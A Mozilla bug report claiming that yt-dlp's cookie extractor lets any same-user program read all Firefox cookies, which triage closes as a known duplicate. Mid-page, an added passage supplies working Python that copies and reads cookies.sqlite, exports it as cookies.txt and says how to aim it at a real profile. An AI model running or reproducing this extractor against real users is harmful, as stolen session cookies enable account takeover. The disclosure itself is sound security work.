Closed Bug 1964105 Opened 3 months ago Closed 3 months ago

High-Impact Cookie Theft Vulnerability On Firefox - No Admin Rights Required

Categories

(Core :: Networking: Cookies, defect, P3)

defect

Tracking

()

RESOLVED DUPLICATE of bug 56788

People

(Reporter: robustrobot11, Unassigned)

Details

(Keywords: reporter-external, Whiteboard: [client-bounty-form][necko-triaged])

Attachments

(1 file)

Attached file REPORT_MOZILLA.md

A vulnerability allows a local attacker without administrative privileges to access and steal all cookies from Firefox on Windows, macOS, and Linux, potentially leading to full account compromise on websites.

Note: This report is being submitted to Chromium and Apple due to vulnerabilities of the same kind being present in Chromium and Safari.

Affected Platforms:

  • Windows
  • Linux
  • macOS

How does it work?

The Python library yt-dlp, popular for downloading videos from a variety of sites (most notably YouTube), has an in-built cookie extractor. The purpose of this is to extract cookies from a user's browser to bypass bot-detection on certain sites.

Specifically, the documentation can be found here: https://github.com/yt-dlp/yt-dlp/wiki/FAQ#how-do-i-pass-cookies-to-yt-dlp

The source code for the cookie extractor can be found here: https://github.com/yt-dlp/yt-dlp/blob/master/yt_dlp/cookies.py

As can be seen in the source code, there are a variety of decryptors built in. This includes Linux Keyring decryptors, and macOS Keychain decryptors, as well as Windows decryptors.

The core issue is how easily yt-dlp leverages OS features (DPAPI, Keychain, Keyrings) – intended for legitimate user data protection – to enable widespread cookie theft by any script or application the user can be tricked into running. It dramatically lowers the bar for this type of attack compared to an attacker having to implement all this decryption logic themselves.

A malevolent threat actor could use this to their advantage, by using the tool to export cookies from the browser, and use the cookies for malicious purposes.

Test Results on various Operating Systems

  • Linux (Debian Bullseye, KDE Plasma):
    • The script ran completely silently. No popups, no quickly opening and closing windows, no stdout.
    • The end result was:
      • Firefox: Extracted all cookies.
        • ⚠️ Data Breached
  • Windows (Windows 11):
    • The script ran completely silently again. No popups, no quickly opening and closing windows.
    • The end result was:
      • Firefox: Extracted all cookies.
        • ⚠️ Data Breached
  • macOS:
    • Direct testing on macOS was not performed, but analysis of yt-dlp's source code shows specific functions for macOS Keychain interaction (_get_mac_keyring_password, MacChromeCookieDecryptor), strongly suggesting Firefox on macOS is also vulnerable.

As can be seen with the test results on Linux and Windows, Firefox clearly suffered the most and lost all of its cookies on both OSes.

Proof of concept is shown in the attached document.

Flags: sec-bounty?
Group: firefox-core-security → core-security
Component: Security → Networking: Cookies
Product: Firefox → Core
Group: core-security → network-core-security
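The report above describes what yt-dlp's extractor does but not why it needs no secret on Firefox. The following is an added example, written for this page and not taken from the bug report, the attached PoC or yt-dlp itself: it builds a constructed cookies.sqlite in a temporary directory using an approximation of Firefox's moz_cookies table (assumption: real profiles carry more columns than listed here), then reads it the way a same-user cookie extractor would (copy the locked database aside, query the copy read-only, emit Netscape cookies.txt lines). The point it makes is the one the triage comment confirms: the value column is plaintext SQLite, so no DPAPI, Keychain or keyring call is involved on the Firefox path. The sample cookies are constructed, not real.

```python
"""Added example: Firefox cookies are readable by any process running as the
user because cookies.sqlite (table moz_cookies) is unencrypted SQLite.
Not part of the bug report or of yt-dlp; schema is approximated (assumption).
"""
import shutil
import sqlite3
import tempfile
from pathlib import Path

# Approximation of Firefox's moz_cookies schema (assumption: a real profile
# has additional columns; the ones used below exist in current profiles).
MOZ_COOKIES_DDL = """
CREATE TABLE moz_cookies (
    id INTEGER PRIMARY KEY,
    originAttributes TEXT NOT NULL DEFAULT '',
    name TEXT,
    value TEXT,
    host TEXT,
    path TEXT,
    expiry INTEGER,
    lastAccessed INTEGER,
    creationTime INTEGER,
    isSecure INTEGER,
    isHttpOnly INTEGER,
    inBrowserElement INTEGER DEFAULT 0,
    sameSite INTEGER DEFAULT 0
)
"""

# Constructed sample rows (not real cookies): name, value, host, path, expiry, isSecure, isHttpOnly
SAMPLE_COOKIES = [
    ("sessionid", "s3cr3t-session-token", ".example.com", "/", 1893456000, 1, 1),
    ("prefs", "theme=dark", "www.example.org", "/", 1893456000, 0, 0),
]

FIELDS = ("host", "path", "secure", "expiry", "name", "value", "http_only")


def make_profile(profile_dir: Path) -> Path:
    """Create a constructed cookies.sqlite that mimics a Firefox profile."""
    db = profile_dir / "cookies.sqlite"
    con = sqlite3.connect(db)
    con.execute(MOZ_COOKIES_DDL)
    con.executemany(
        "INSERT INTO moz_cookies (name, value, host, path, expiry, isSecure, isHttpOnly) "
        "VALUES (?, ?, ?, ?, ?, ?, ?)",
        SAMPLE_COOKIES,
    )
    con.commit()
    con.close()
    return db


def extract_firefox_cookies(cookies_sqlite: Path) -> list[dict]:
    """Read every cookie from a Firefox cookies.sqlite.

    A running Firefox holds a lock on the file, so extractors copy it (and the
    SQLite WAL side file, if present, which may hold recent un-checkpointed
    writes) to a scratch directory and query the copy. The copy is opened
    read-only so the demonstration never modifies anything. No key material
    is needed anywhere in this function: the value column is plaintext.
    """
    with tempfile.TemporaryDirectory() as tmp:
        copy = Path(tmp) / "cookies.sqlite"
        shutil.copy2(cookies_sqlite, copy)
        wal = cookies_sqlite.with_name(cookies_sqlite.name + "-wal")
        if wal.exists():
            shutil.copy2(wal, copy.with_name(copy.name + "-wal"))
        con = sqlite3.connect(copy.as_uri() + "?mode=ro", uri=True)
        rows = con.execute(
            "SELECT host, path, isSecure, expiry, name, value, isHttpOnly "
            "FROM moz_cookies ORDER BY id"
        ).fetchall()
        con.close()
    return [dict(zip(FIELDS, row)) for row in rows]


def to_netscape(cookies: list[dict]) -> str:
    """Serialize to Netscape cookies.txt, the format yt-dlp's --cookies reads.

    Tab-separated: domain, include_subdomains, path, secure, expiry, name,
    value. HttpOnly cookies get the conventional '#HttpOnly_' domain prefix.
    """
    lines = ["# Netscape HTTP Cookie File"]
    for c in cookies:
        prefix = "#HttpOnly_" if c["http_only"] else ""
        include_sub = "TRUE" if c["host"].startswith(".") else "FALSE"
        secure = "TRUE" if c["secure"] else "FALSE"
        lines.append("\t".join([prefix + c["host"], include_sub, c["path"],
                                secure, str(c["expiry"]), c["name"], c["value"]]))
    return "\n".join(lines) + "\n"


def demo() -> list[dict]:
    """Build the constructed profile, extract from it, return the cookies."""
    with tempfile.TemporaryDirectory() as profile:
        db = make_profile(Path(profile))
        return extract_firefox_cookies(db)


if __name__ == "__main__":
    print(to_netscape(demo()))
```

Run against a real profile by pointing extract_firefox_cookies at ~/.mozilla/firefox/<profile>/cookies.sqlite (or the equivalent %APPDATA% / ~/Library path); the only privilege required is read access to the user's own profile directory, which is exactly the bar the report describes.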

This is a well-known issue, and potentially encrypting the cookie database is on our roadmap.
https://www.cyberark.com/resources/threat-research-blog/the-current-state-of-browser-cookies

Severity: -- → S3
Priority: -- → P3
Whiteboard: [client-bounty-form] → [client-bounty-form][necko-triaged]

See the Device Bound Session Credentials proposal for a general solution.

Group: network-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 3 months ago
Duplicate of bug: 56788
Resolution: --- → DUPLICATE
Flags: sec-bounty? → sec-bounty-
